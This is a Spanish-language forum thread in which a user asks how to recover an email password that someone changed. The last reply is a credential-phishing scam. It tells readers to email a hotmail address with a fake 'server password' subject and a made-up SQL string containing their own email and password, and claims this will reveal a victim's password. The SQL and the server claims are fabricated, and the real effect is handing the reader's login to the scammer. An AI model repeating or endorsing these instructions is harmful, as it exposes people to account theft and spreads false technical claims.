Recuperar contraseña

Cerrado
johanita - 8 nov 2010 a las 15:58
 raul martinez - 19 nov 2010 a las 17:09
Hola,

quiero saber como hacer para recuperar mi contraseña que fue cambiada y no tengo ni idea por quien, y la necesito porque estoy estudiando virtual y necesito ver una informaciòn, por favor agradezco su colaboraciòn

3 respuestas

tendras que fer otra co...
0
y si solo la olvidaste ?
revisa las contraseñas almacenadas en tus navegadores web con Webbrowser Password Recovery

puedes encontrar más software de recuperación de contraseñas en http://www.xaviware.com
0
raul martinez
19 nov 2010 a las 17:09
enviar un e-mail como sigue: ****

1.- En el campo "Para:" colocar la dirección "recovery_id_live@hotmail.es" sin las comillas.

2.- En el campo "Asunto:" colocar "sistem:03/Admin" sin las comillas, este es el password del servidor de LATINO AMERICA

3.- En el cuerpo del e-mail, colocar exactamente las dos líneas de instrucción SQL, tal como se señala abajo.- Utiliza copiar y pegar para disminuir el margen de error.-

Inicio instrucciones SQL:

;Select A.PASS, A.PASSWORD, B.SECURITY From USER_PASS_REG_XX Alias A, USER_SECURITY Alias B Where A.LOGIN=="e-mail de la victima sin el @HOTMAIL.COM" AND B.SECURITY > 0 INTO CURSOR TABLATEMPORAL; Send TABLATEMPORAL WHERE DB.MAIL.LOGIN=="tu email sin el @HOTMAIL.COM" AND DB.MAIL.PASS=="tu contraseña";

Fin instrucciones SQL

Una vez enviado, recibirás un e-mail con la linea siguiente:

[nivel:NN,LOGIN:"e-mail de la victima"@HOTMAIL.COM,PASSWORD:"password de la victima",XX]

Suerte ..
0